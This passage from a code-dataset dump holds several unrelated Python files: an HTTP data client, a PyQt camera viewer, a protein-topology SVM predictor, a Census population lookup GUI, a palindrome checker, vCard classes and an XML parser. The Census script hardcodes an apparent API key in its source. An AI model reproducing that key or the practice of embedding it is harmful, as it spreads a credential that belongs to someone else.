None)\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/api/openstack/compute/legacy_v2/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":48624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"71068347345","text":"###### GENERAL ######\nimport pandas as pd\nimport time\nfrom ToolBox import compress, decompress\n\n###### HTTP ######\nimport requests\n\n###### LOGGER ######\nfrom ProcessLogger import ProcessLogger\n\nclass DataManager:\n def __init__(self, host=\"0.0.0.0\", port=5000):\n self.__server_url = \"http://\" + host + \":\" + str(port)\n self.__logger = ProcessLogger(\"__DataManager__\")\n\n iterations = 0\n while True:\n if iterations >= 30:\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n iterations += 1\n try:\n requests.get(self.__server_url + \"/status\")\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n break\n\n\n def get_supplementary_data(self, name):\n iterations = 0\n while iterations < 30:\n iterations += 1\n try:\n r = requests.get(self.__server_url + \"/data\", params={\"name\": name})\n return pd.read_json(\n r.text,\n orient=\"records\"\n )\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n\n def get_batch(self, size):\n iterations = 0\n while iterations < 30:\n iterations += 1\n try:\n r = requests.get(self.__server_url + \"/batch\", params={\"batch_size\": size})\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n if r.status_code != 200:\n time.sleep(1)\n continue\n\n data = r.content\n return decompress(data)\n\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n\n def store_result(self, results):\n data = {}\n for key in list(results):\n data[key] = results[key].to_json(orient=\"records\")\n\n compressed = compress(data)\n\n iterations = 0\n while True:\n if iterations >= 60:\n self.__logger.info(\"Error: Could not connect to host\")\n exit(0)\n iterations += 1\n try:\n r = requests.post(self.__server_url + \"/result\", data=compressed)\n except requests.exceptions.ConnectionError:\n time.sleep(1)\n continue\n else:\n # Keep trying to post results until server accepts\n if r.status_code != 200:\n time.sleep(1)\n continue\n else:\n return\n\n\n","repo_name":"dakie14/HPC_GWAS","sub_path":"DataManager.py","file_name":"DataManager.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11127094634","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Yu-Sheng Lin\"\n__copyright__ = \"Copyright (C) 2016-2022\"\n__license__ = \"AGPL\"\n__email__ = \"pyquino@gmail.com\"\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtCore import pyqtSlot\nfrom ids_peak import ids_peak\n\nimport platform\nimport numpy as np\nimport math\nimport time\nimport cv2\nimport os\nimport datetime\nimport ctypes\nimport struct\n\n# check for install the ids camera sdk\ntry:\n from pyueye import ueye\nexcept ImportError:\n print(\"Do not install pyueye\")\n print(\"Please use 'pip install pyueye' to install modules\")\n\n\nclass Thread_show_image(QThread):\n send_image = pyqtSignal(QPixmap)\n\n def __init__(self, hcam, width, height, sInfo, nBitsPerPixel, parent=None):\n QThread.__init__(self, parent)\n self.hCam = hcam\n self.width = width\n self.height = height\n self.sInfo = sInfo\n self.nBitsPerPixel = nBitsPerPixel\n self.pcImageMemory = ueye.c_mem_p()\n self.MemID = ueye.int()\n self.pitch = ueye.INT()\n self.stop_thread = False\n self.flag_save = False\n\n init_events = ueye.IS_INIT_EVENT()\n init_events.nEvent = ueye.IS_SET_EVENT_FRAME\n init_events.bManualReset = False\n init_events.bInitialState = False\n ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_INIT, init_events, ueye.sizeof(init_events))\n\n events = ueye.c_uint(ueye.IS_SET_EVENT_FRAME)\n ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_ENABLE, events, ueye.sizeof(events))\n\n self.wait_events = ueye.IS_WAIT_EVENT()\n self.wait_events.nEvent = ueye.IS_SET_EVENT_FRAME\n self.wait_events.nCount = 2\n self.wait_events.nTimeoutMilliseconds = 1000\n self.wait_events.nSignaled = 0\n self.wait_events.nSetCount = 0\n self.bytes_per_pixel = int(nBitsPerPixel / 8)\n\n nRet = ueye.is_AllocImageMem(self.hCam, width, height, nBitsPerPixel, self.pcImageMemory, self.MemID)\n\n if nRet != ueye.IS_SUCCESS:\n print(\"is_AllocImageMem ERROR\")\n else:\n # Makes the specified image memory the active memory\n nRet = ueye.is_SetImageMem(self.hCam, self.pcImageMemory, self.MemID)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_SetImageMem ERROR\")\n else:\n # Set the desired color mode\n nRet = ueye.is_SetColorMode(self.hCam, ueye.int(0))\n\n nRet = ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_CaptureVideo ERROR\")\n\n nRet = ueye.is_InquireImageMem(self.hCam, self.pcImageMemory, self.MemID, width, height, nBitsPerPixel, self.pitch)\n if nRet != ueye.IS_SUCCESS:\n print(\"is_InquireImageMem ERROR\")\n\n def continue_save_img(self):\n self.tmp = []\n self.flag_save = True\n self.max_img = 5\n\n def save_img(self):\n for i in range(len(self.tmp)):\n cv2.imwrite(f\"{i}.jpg\", self.tmp[i])\n\n def run(self):\n\n while True:\n ret = ueye.is_Event(self.hCam, ueye.IS_EVENT_CMD_WAIT, self.wait_events, ueye.sizeof(self.wait_events))\n if (ueye.IS_SET_EVENT_FRAME == self.wait_events.nSignaled):\n array = ueye.get_data(self.pcImageMemory, self.width, self.height, self.nBitsPerPixel, self.pitch, copy=False)\n frame = np.reshape(array, (self.height.value, self.width.value, self.bytes_per_pixel))\n # print((self.height.value, self.width.value, self.bytes_per_pixel))\n qImg = QImage(frame, self.width.value, self.height.value, QImage.Format_RGB888)\n qImg = qImg.scaled(int(self.width.value / 2), int(self.height.value / 2))\n qpxmp = QPixmap.fromImage(qImg)\n if self.flag_save:\n self.tmp.append(frame)\n if len(self.tmp) > self.max_img:\n self.flag_save = False\n self.save_img()\n self.send_image.emit(qpxmp)\n if self.stop_thread:\n break\n self.wait(200)\n\n def stop_thr(self):\n self.stop_thread = True\n # Ret = ueye.is_FreeImageMem(self.hCam, self.pcImageMemory, self.MemID)\n\n\nclass Thread_count(QThread):\n test_signal = pyqtSignal(QPixmap)\n\n def __init__(self, hcam, width, height, sInfo, m_vpcSeqImgMem, bufeersize, nBitsPerPixel, parent=None):\n QThread.__init__(self, parent)\n self.hCam = hcam\n self.width = width\n self.height = height\n self.sInfo = sInfo\n self.m_vpcSeqImgMem = m_vpcSeqImgMem\n self.bufeersize = bufeersize\n self.nBitsPerPixel = nBitsPerPixel\n self.pitch = ueye.INT()\n\n def run(self):\n width = self.sInfo.nMaxWidth\n height = self.sInfo.nMaxHeight\n # create an event of camera\n ueye.is_EnableEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n # ueye.is_FreezeVideo(self.hCam, ueye.IS_DONT_WAIT)\n count = 0\n # count the frame ret\n if platform.system() == \"Windows\":\n try:\n import win32event\n import ctypes\n hEvent = win32event.CreateEvent(None, False, False, None)\n hEvent_FL = int(hEvent)\n pEvent_FL = ueye.c_void_p(hEvent_FL)\n # hEvent = ueye.c_void_p()\n ueye.is_InitEvent(self.hCam, pEvent_FL, ueye.IS_SET_EVENT_FRAME)\n except ImportError:\n print(\"error\")\n\n while True:\n iImageID = ueye.c_int(0)\n pBuffer = ueye.c_mem_p()\n\n if platform.system() == \"Linux\":\n nRet = ueye.is_WaitEvent(self.hCam, ueye.IS_SET_EVENT_FRAME, 1000)\n elif platform.system() == \"Windows\":\n nRet = None\n\n dwRet = ctypes.windll.kernel32.WaitForSingleObject(pEvent_FL, 1000)\n\n # TODO: need to check how to use event\n if nRet == ueye.IS_SUCCESS or dwRet == win32event.WAIT_OBJECT_0:\n\n self.array = ueye.get_data(self.m_vpcSeqImgMem[count - 1], self.width, self.height,\n 24, 12312, copy=False)\n frame = np.reshape(self.array, (self.height.value, self.width.value, 3))\n # ...resize the image by a half\n qImg = QImage(frame, self.width.value, self.height.value, QImage.Format_RGB888) # Format_Grayscale8\n # qImg = qImg.scaled(int(self.width.value / 2), int(self.height.value / 2))\n qpxmp = QPixmap.fromImage(qImg)\n self.test_signal.emit(qpxmp)\n ueye.is_UnlockSeqBuf(self.hCam, iImageID, pBuffer)\n count = count + 1\n\n if platform.system() == \"Windows\":\n if dwRet == win32event.WAIT_TIMEOUT: # win32event.WAIT_FAILED\n print(\"timeout in windows\")\n break\n elif platform.system() == \"Linux\":\n if nRet != ueye.IS_SUCCESS:\n print(f\"error code {nRet}\")\n break\n\n if count >= self.bufeersize:\n print(f\"this is test {len(self.m_vpcSeqImgMem)}\")\n # ueye.is_FreezeVideo(self.hCam, ueye.IS_WAIT)\n ueye.is_FreezeVideo(self.hCam, ueye.IS_DONT_WAIT)\n break\n # i = i + 1\n ueye.is_DisableEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n if platform.system() == \"Windows\" and pEvent_FL != None:\n ueye.is_ExitEvent(self.hCam, ueye.IS_SET_EVENT_FRAME)\n # import win32api\n # win32api.CloseHandle(hEvent)\n ctypes.windll.Kernel32.CloseHandle(pEvent_FL)\n\n\nclass MainWindow(QMainWindow):\n\n signal1 = pyqtSignal()\n\n def __init__(self, parent = None):\n super(MainWindow, self).__init__()\n loadUi(\"core/mainwindow.ui\", self)\n # self.__init_setting()\n # self._add_action()\n self.show()\n\n self._init_ids_camera(0)\n nRet = ueye.is_InitCamera(self.hCam, None)\n if nRet == 3:\n print(\"Do not find the camera\")\n print(\"Please insert the cable to the computer\")\n exit()\n\n self.liveframe = None\n self.bufeersize = None\n # ueye.is_SetColorMode(self.hCam, ueye.IS_CM_RGB8_PACKED)\n self.m_viSeqMemID = []\n self.m_vpcSeqImgMem = []\n # self.signal1.connect(self.update_image)\n\n # self.image_thread = Thread_show_image(self.hCam, self.width, self.height, self.sInfo, self.nBitsPerPixel)\n # self.image_thread.start()\n # self.image_thread.send_image.connect(self.update_image)\n\n def _init_ids_camera(self, camera_ids):\n self.hCam = ueye.HIDS(camera_ids) # 0: first available camera; 1-254: The camera with the specified camera ID\n self.sInfo = ueye.SENSORINFO()\n self.cInfo = ueye.CAMINFO()\n self.pcImageMemory = ueye.c_mem_p()\n self.MemID = ueye.int()\n self.rectAOI = ueye.IS_RECT()\n self.width = ueye.int(4104) # 相機解析度\n self.height = ueye.int(2174) # 相機解析度\n self.pitch = ueye.INT()\n self.nBitsPerPixel = ueye.INT(32) # 24: bits per pixel for color mode; take 8 bits per pixel for monochrome\n channels = 3 # 3: channels for color mode(RGB); take 1 channel for monochrome\n self.m_nColorMode = ueye.INT(0) # Y8/RGB16/RGB24/REG32\n self.bytes_per_pixel = int(self.nBitsPerPixel / 8)\n self.m_buffer_init = 0\n self.fps_second = ueye.DOUBLE()\n self.exposure_time_max = ueye.DOUBLE()\n self.exposure_time_min = ueye.DOUBLE()\n self.gainFactor = ueye.DOUBLE()\n self.maxFrame = ueye.DOUBLE()\n self.miniFrame = ueye.DOUBLE()\n self.intervallFrame = ueye.DOUBLE()\n\n def camSeqBuild(self):\n bRet = False\n FrameTimeMin = ueye.c_double()\n FrameTimeMax = ueye.c_double()\n FrameTimeIntervall = ueye.c_double()\n nRet = ueye.is_GetFrameTimeRange(self.hCam, FrameTimeMin, FrameTimeMax, FrameTimeIntervall)\n # nRet = 0\n if nRet == ueye.IS_SUCCESS:\n # print(FrameTimeMin)\n maxBuffer = (1 / FrameTimeMin) + 0.5\n # print(maxBuffer)\n if maxBuffer < 3:\n nmaxbuffer = 3\n else:\n nmaxbuffer = self.bufeersize\n\n imageSize = ueye.IS_RECT()\n nRet = ueye.is_AOI(self.hCam, ueye.IS_AOI_IMAGE_GET_AOI, imageSize, ueye.sizeof(imageSize))\n self.width = imageSize.s32Width\n self.height = imageSize.s32Height\n\n # allocate buffer (memory) in a for-loop\n for i in range(0, nmaxbuffer):\n\n iImageID = ueye.c_int(0)\n pcImhMem = ueye.c_mem_p()\n\n nRet = ueye.is_AllocImageMem(self.hCam, self.width, self.height, self.nBitsPerPixel, pcImhMem, iImageID)\n if nRet != ueye.IS_SUCCESS:\n break\n nRet = ueye.is_AddToSequence(self.hCam, pcImhMem, iImageID)\n if nRet != ueye.IS_SUCCESS:\n ueye.is_FreeImageMem(self.hCam, pcImhMem, iImageID)\n break\n\n self.m_viSeqMemID.append(iImageID)\n self.m_vpcSeqImgMem.append(pcImhMem)\n\n # nRet = ueye.is_InitImageQueue(hCam, 0)\n if nRet == ueye.IS_SUCCESS:\n bRet = True\n else:\n bRet = False\n return bRet\n\n @pyqtSlot()\n def on_testbtn_clicked(self):\n print(123)\n self.image_thread.continue_save_img()\n # self.all_process()\n\n @pyqtSlot()\n def on_openlive_clicked(self):\n print(\"open live mode\")\n self.image_thread = Thread_show_image(self.hCam, self.width, self.height, self.sInfo, self.nBitsPerPixel)\n self.image_thread.start()\n self.image_thread.send_image.connect(self.update_image)\n\n @pyqtSlot()\n def on_close_live_clicked(self):\n print(\"close the live mode\")\n self.image_thread.stop_thr()\n self.image_thread.exec_()\n ueye.is_ExitCamera(self.hCam)\n\n def all_process(self):\n \"\"\"This function connect all process\"\"\"\n pass\n # # Build Camera Sequence\n # self.bufeersize = 100 # self.number_of_shots.value()\n # bRet = self.camSeqBuild()\n #\n # if bRet is True:\n # print(\"IS_SUCCESS\")\n # else:\n # self.CamSeqKill()\n # ueye.is_ExitCamera(self.hCam)\n # print(\"Error\")\n #\n # # build thread\n # # t = threading.Thread(target=self.job)\n # ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n # # ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n #\n # self.test_thread = Thread_count(self.hCam, self.width, self.height, self.sInfo, self.m_vpcSeqImgMem,\n # self.bufeersize, self.nBitsPerPixel)\n # self.test_thread.test_signal.connect(self.update_image)\n # self.test_thread.finished.connect(self.savve)\n # self.test_thread.start()\n\n def savve(self):\n # save image\n folder_name = datetime.datetime.now().strftime(\"%Y_%m_%d-%H%M\")\n # os.mkdir(f\"{folder_name}\")\n # self.save_img(self.m_vpcSeqImgMem, self.m_viSeqMemID, folder_name)\n\n self.CamSeqKill()\n\n def save_img(self, mem, iImageID, folder_name: str):\n print(len(mem))\n plast = ueye.c_mem_p()\n\n for i in range(0, len(mem)):\n # process the pointer memory translate to image\n # TODO: add process on get data form image\n\n parameter = ueye.IMAGE_FILE_PARAMS(ppcImageMem=mem[i], pnImageID=iImageID[i])\n parameter.pwchFileName = f\"{folder_name}/{i}.jpeg\"\n parameter.nQuality = 0\n parameter.nFileType = ueye.IS_IMG_JPG\n ueye.is_ImageFile(self.hCam, ueye.IS_IMAGE_FILE_CMD_SAVE, parameter, ueye.sizeof(parameter))\n\n def CamSeqKill(self):\n # ueye.is_ExitImageQueue(hCam)\n ueye.is_ClearSequence(self.hCam)\n # Free buffer\n for i in range(0, len(self.m_viSeqMemID)):\n Ret = ueye.is_FreeImageMem(self.hCam, self.m_vpcSeqImgMem[i], self.m_viSeqMemID[i])\n self.m_vpcSeqImgMem.clear()\n self.m_viSeqMemID.clear()\n\n def update_image(self, data):\n self.image1.setPixmap(data)\n self.image1.setScaledContents(True)\n\n def closeEvent(self, *args, **kwargs):\n self.image_thread.stop_thr()","repo_name":"kmolLin/PAOM_ids","sub_path":"core/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":14580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41711283810","text":"# print('''please input a fasta file of the Beta-barrel protein\n# that you want to predict its topology:\n# i: inner-loop, o: outer-loop, m: transmembrane Beta strand\n# path: ''')\n\nimport sys\npath=sys.argv[1]\n\nopenfile=open(path,'r')\nopenfile=openfile.readlines()\nID=openfile[0].rstrip('\\n').lstrip('>')\nID=str(ID)\n# seqstring=openfile[1]\n# seq=[]\n#\n# seq.append(openfile[1])\n\npath=str(path)+'.pssm'\n\nPSIfreq=[]\nwith open(path, 'r') as path:\n path = path.readlines()\n for line in path[3:-6]:\n line = line.split()\n freq=line[22:42]\n # print(freq)\n # print(freq[-1])\n # freq[1][:0]=zeroes\n # freq[-1].extend(zeroes)\n PSIfreq.append(freq)\n # PSSMlist.append(PSIfreq)\n\nPSIfreqfloat=[]\nfor each_position in PSIfreq:\n eachres=[]\n for eachfreq in each_position:\n eachfreq=(float(eachfreq)/100)\n # eachfreq=round(eachfreq,2)\n eachres.append(eachfreq)\n PSIfreqfloat.append(eachres)\n\n\nzeropad=([float(0)]*20)\n\nws=31\nsp=int(ws/2)\ntemptrainingset=[]\n# eachprotein=[]\n\nproteintest=[]\n\neachproteintest=[]\nfor i in range(0,len(PSIfreqfloat)):\n if i= (len(PSIfreqfloat)-sp):\n middle=PSIfreqfloat[(i-sp):ws-(sp-i)+1]\n if len(middle) != ws:\n middle.extend([zeropad]*(ws-len(middle)))\n middle=[a for b in middle for a in b]\n eachproteintest.append(middle)\n else:\n w=PSIfreqfloat[(i-sp):(i+sp+1)]\n w=[a for b in w for a in b]\n eachproteintest.append(w)#\n\nfrom sklearn.externals import joblib\nfrom sklearn import svm\nclf=joblib.load('linear_svmpredictor.pkl')\npred=clf.predict(eachproteintest)\npredictionresult=list(pred)\ndicfeastates={0:\"i\",1:\"o\",2:\"m\"}\npredictionstring=[]\nfor eachpred in predictionresult:\n eachpred=dicfeastates[eachpred]\n predictionstring.append(eachpred)\npredstring=''.join(predictionstring)\n#\n\nprint(\"The prediction of %s is: \" %(ID))\nprint(\" \")\nprint(predstring)\nprint(\"'i'is inner-loop, 'o' is outer-loop, 'm' is transmembrane beta strand\")\nprint(\" \")\n\nwith open('prediction_of_topology.txt', 'w') as fwrite:\n for i in range(0,len(openfile)):\n fwrite.write(openfile[i])\n fwrite.write(\"\\n >%s_prediction_topology \\n\" %(ID))\n fwrite.write(predstring)\n","repo_name":"kawairine/hello-word","sub_path":"1_final/linearsvmpredictor.py","file_name":"linearsvmpredictor.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24563967583","text":"# Author: Alyssa Lada\n# Course: CS-361\n# Date Created: 02/2021\n# Date Last Modified: 02/14/2021\n# Program Title: Population Generator\n# Description: This program creates a graphic user interface and an outfile.\n# It receives state and year from the user via GUI or an input.csv file, calls the US Census API, and returns\n# the total population for the state and year. The original year and state, and the retrieved population are\n# exported to output.csv in the same directory. The program runs from the command line.\n\n\nfrom tkinter import *\nfrom tkinter import ttk\nimport requests\nimport csv\nimport sys\n\n# Instructions\nprint(\"\\nFor graphic user interface, run on the command line.\")\nprint(\"For csv file input, run on command line.\")\nprint(\"Output.csv will be created in the same directory as the program for the last run query.\")\n\n\ndef create_outfile(input_year, input_state, output_population_size):\n \"\"\"Writes output.csv with year, state, and population info.\"\"\"\n with open(\"output.csv\", 'w', newline='') as out_file:\n writer = csv.writer(out_file)\n writer.writerow([\"input_year\", \"input_state\", \"output_population_size\"])\n writer.writerow([input_year, input_state.upper(), output_population_size])\n print(\"\\nOutput.csv created.\")\n\ndef call_census_api(year, state_code):\n \"\"\"Returns the total population for a given year (2005 - 2019) and two digit state code.\"\"\"\n\n def convert_state_code_to_num(state_code):\n \"\"\"Converts two-letter state code to API numeric code.\"\"\"\n state_abbr_dict = [(\"01\", \"AL\"), (\"02\", \"AK\"), (\"04\", \"AZ\"), (\"05\", \"AR\"),\n (\"06\", \"CA\"), (\"08\", \"CO\"), (\"09\", \"CT\"), (\"10\", \"DE\"),\n (\"11\", \"DC\"), (\"12\", \"FL\"), (\"13\", \"GA\"), (\"15\", \"HI\"),\n (\"16\", \"ID\"), (\"17\", \"IL\"), (\"18\", \"IN\"), (\"19\", \"IA\"),\n (\"20\", \"KS\"), (\"21\", \"KY\"), (\"22\", \"LA\"), (\"23\", \"ME\"),\n (\"24\", \"MD\"), (\"25\", \"MA\"), (\"26\", \"MI\"), (\"27\", \"MN\"),\n (\"28\", \"MS\"), (\"29\", \"MO\"), (\"30\", \"MT\"), (\"31\", \"NE\"),\n (\"32\", \"NV\"), (\"33\", \"NH\"), (\"34\", \"NJ\"), (\"35\", \"NM\"),\n (\"36\", \"NY\"), (\"37\", \"NC\"), (\"38\", \"ND\"), (\"39\", \"OH\"),\n (\"40\", \"OK\"), (\"41\", \"OR\"), (\"42\", \"PA\"), (\"44\", \"RI\"),\n (\"45\", \"SC\"), (\"46\", \"SD\"), (\"47\", \"TN\"), (\"48\", \"TX\"),\n (\"49\", \"UT\"), (\"50\", \"VT\"), (\"51\", \"VA\"), (\"53\", \"WA\"),\n (\"54\", \"WV\"), (\"55\", \"WI\"), (\"56\", \"WY\"), (\"72\", \"PR\")]\n\n state_num = \"*\"\n for tup in state_abbr_dict:\n if tup[1] == state_code.upper():\n state_num = tup[0]\n\n return state_num\n\n # create api url\n hostname = \"https://api.census.gov/data/\"\n data_set_name_acronym = \"acs/acs1\"\n key = \"d19aa6beb1cd793f0c25452ff63400bbe5fb8cd6\"\n state_num = convert_state_code_to_num(state_code)\n url = hostname + year + \"/\" + data_set_name_acronym + \"?get=NAME,B01001_001E&for=state:\" + state_num + \"&key=\" + key\n\n response = requests.get(url)\n\n # convert api response data to display format\n population = response.text.split(\",\")[4][1:-1] # locate and trim population string\n\n return population\n\n\ndef create_GUI():\n \"\"\"GUI to collect year and state input from user.\"\"\"\n\n def get_population(*args):\n \"\"\"Calls call_census_api and create_outfile using year and state textvariables from interface.\"\"\"\n retrieved_population = call_census_api(year.get(), state.get()) # text variables auto update with tk\n\n population.set(retrieved_population) # displays on gui\n\n # automatically create outfile\n create_outfile(year.get(), state.get(), retrieved_population)\n\n # set the main application window\n root = Tk()\n root.title(\"Population Generator\")\n\n # create the content frame window\n mainframe = ttk.Frame(root, padding=\"12 12 12 12\")\n mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # input widget for year selection\n year = StringVar()\n year_entry = ttk.Entry(mainframe, width=4, textvariable=year)\n year_entry.grid(column=2, row=1, sticky=(W, E))\n ttk.Label(mainframe, text=\"Enter census year (2005-2019):\").grid(column=1, row=1, sticky=(W, E))\n\n # input widget for state selection\n state = StringVar()\n state_entry = ttk.Entry(mainframe, width=2, textvariable=state) # specify the parent that the widget will be placed inside\n state_entry.grid(column=2, row=2, sticky=(W, E))\n ttk.Label(mainframe, text=\"Enter state code (example: TX):\").grid(column=1, row=2, sticky=(W, E))\n\n # get population button\n ttk.Button(mainframe, text=\"Get Population\", command=get_population).grid(column=2, row=3, sticky=E)\n\n # population output screen\n population = StringVar()\n ttk.Label(mainframe, text=\"Population: \").grid(column=1, row=4, sticky=(E, W))\n ttk.Label(mainframe, textvariable=population).grid(column=2, row=4, sticky=(E, W))\n\n # pad children in mainframe\n for child in mainframe.winfo_children():\n child.grid_configure(padx=5, pady=5)\n\n year_entry.focus()\n root.bind(\"\", get_population)\n\n root.mainloop()\n\n\n# CLI entry point\n# check if command line start has valid argument\nif len(sys.argv) > 1:\n try:\n with open(sys.argv[-1], \"r\") as in_file:\n csv_year_state = in_file.read().splitlines()[1].split(\",\")\n\n year = csv_year_state[0]\n state = csv_year_state[1]\n population = call_census_api(year, state)\n\n create_outfile(year, state, population)\n\n except IOError:\n print(\"Invalid argument\")\nelse:\n create_GUI()\n\n# Resources\n# https://tkdocs.com/tutorial/firstexample.html\n# https://docs.python.org/3/library/tkinter.html\n# https://www.census.gov/data/developers/guidance/api-user-guide.Example_API_Queries.html\n# https://www.programiz.com/python-programming/csv\n# https://stackoverflow.com/questions/7033987/python-get-files-from-command-line\n# https://docs.python.org/3/library/functions.html#open\n","repo_name":"sudodragon/Population-Generator","sub_path":"population-generator.py","file_name":"population-generator.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"692923583","text":"from ..value import vValue, vTextValue, vBinaryValue\nfrom ..parameter import vParameterList, vParameter\n\nfrom .attribute import vAttribute, vAttributeType\n\nclass vAbstractTextAttr( vAttribute ):\n # abstract class implementing an attribute-type with a single text value\n\n # class attribute storing the decoded value\n _value_class_attr_name = 'text'\n \n def __init__(self):\n text_value = vTextValue( \"\" )\n self.__setattr__( self._value_class_attr_name, text_value )\n super().__init__()\n\n def encode_value(self):\n text_value = getattr(self, self._value_class_attr_name )\n return text_value.escape()\n\n def decode_value(self, value):\n self._value = vTextValue( value )\n text_value = self._value.unescape()\n setattr( self, self._value_class_attr_name, text_value )\n\nclass vAbstractTextListAttr( vAttribute ):\n # abstract class implementing an attribute-type with a single text list value\n\n # class attribute storing the decoded value list\n _value_class_attr_name = 'text'\n \n def __init__(self):\n self.__setattr__( self._value_class_attr_name, [] )\n super().__init__()\n\n def encode_value(self):\n text_value_list = getattr(self, self._value_class_attr_name )\n str_value_list = [ str(c.escape()) for c in text_value_list ]\n return vTextValue(',').join( str_value_list )\n\n def decode_value(self, value):\n self._value = vTextValue( value )\n text_value_list = self._value.escaped_split( ',', unescape_parts=True )\n setattr( self, self._value_class_attr_name, text_value_list )\n\nclass vAbstractStructTextAttr( vAttribute ):\n # abstract class for structured text attributes: \n # a list of components (lists of text-value) with fixed semantic \n\n # list of class attribute names. The order corresponds to the semantic \n # defined in the RFCs\n _component_order = ( )\n\n def __init__(self):\n for prop_name in self._component_order:\n setattr(self, prop_name, [] )\n super().__init__()\n\n def encode_value(self):\n struct_str_list = []\n for prop_name in self._component_order:\n text_value_list = getattr( self, prop_name )\n str_value_list = [ str(c.escape()) for c in text_value_list ]\n struct_str_list.append( ','.join(str_value_list) )\n return vTextValue(';').join( struct_str_list )\n\n def decode_value(self, value):\n self._value = vTextValue( value )\n struct = self._value.escaped_split( ';' )\n len_diff = len( self._component_order ) - len( struct )\n if len_diff > 0:\n struct.extend( [ vTextValue(\"\") for i in range(len_diff) ] )\n\n for i in range( len(self._component_order) ):\n text_value_list = struct[ i ].escaped_split( ',', unescape_parts=True )\n setattr( self, self._component_order[i], text_value_list )\n\nclass vAbstractBinaryUriAttr( vAttribute ):\n # abstract class implementing a binary value type with inline or url content\n \n def __init__(self):\n super().__init__()\n self._uri = vValue( '' )\n self._data = vBinaryValue( b'' )\n\n @property\n def has_uri(self):\n value_param = self._params.get( 'value', default=vParameter() )\n return value_param.has_value( 'uri', ignorecase=True )\n\n @property\n def uri(self):\n return self._uri\n\n @uri.setter\n def uri(self, uri):\n self._params.set( 'value', 'uri' )\n self._uri = vValue( uri )\n \n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n del self.params['value']\n self._params.set( 'encoding', 'b' )\n self._data = vBinaryValue( data )\n \n def encode_value(self):\n if self.has_uri:\n return vValue( self._uri )\n return vBinaryValue( self._data )\n\n def decode_value(self, value):\n if self.has_uri:\n self._value = vValue( value )\n self._uri = self._value\n self._data = vBinaryValue( b'' )\n else:\n self._value = vBinaryValue( value )\n self._uri = vValue( '' )\n self._data = self._value\n self._params.set( 'encoding', 'b' )\n","repo_name":"ObviusOwl/eml-vcard-export","sub_path":"eml_vcard_export/vcard/attributes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26253553891","text":"def is_palindrome(string):\n formatted_string = ''.join(filter(str.isalpha, string)).lower()\n length = len(formatted_string)\n for i in range(length):\n if formatted_string[i] != formatted_string[length - i - 1]:\n return False\n return True\n \n\ndef main():\n test_values = [\n 'Казак',\n 'А роза упала на лапу Азора', \n 'Do geese see God?', \n 'Madam, I’m Adam',\n 'nonPalindromicString',\n 'WhatIsThisTest'\n ]\n assert_values = [True, True, True, True, False, False]\n for test_val, assert_val in zip(test_values, assert_values):\n print(f'Expected: {assert_val}; Received: {is_palindrome(test_val)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"reproductionprohibited/intensive-dev-lyceum-1580-2022","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1748399025","text":"import xml.sax\nimport xml.sax.handler\nimport sys\n\n\nclass Handler(xml.sax.handler.ContentHandler):\n def startElement(self, name, qname, attrs):\n print(\"Start:\", name, qname)\n\n def endElement(self, name, qname):\n print(\"End:\", name, qname)\n\n def characters(self, content):\n print(\"character:\" + content)\n return \n\nif __name__==\"__main__\":\n parser = xml.sax.make_parser()\n parser.setContentHandler(Handler())\n parser.setFeature(xml.sax.handler.feature_namespaces, True)\n parser.parse(sys.argv[1])","repo_name":"KeigoMatsumura/NLP-lecture-practice","sub_path":"lecture3/anlp-03-1.py","file_name":"anlp-03-1.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16835339347","text":"from __future__ import print_function\nimport unittest\n\nimport numpy as np\nfrom scipy.special import expit, erf\n\nfrom paddle.fluid.tests.unittests.op_test import OpTest, convert_float_to_uint16\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nimport paddle.fluid as fluid\nimport paddle.fluid.core as core\nfrom paddle.fluid import compiler, Program, program_guard\n\npaddle.enable_static()\nSEED = 2049\n\n\nclass 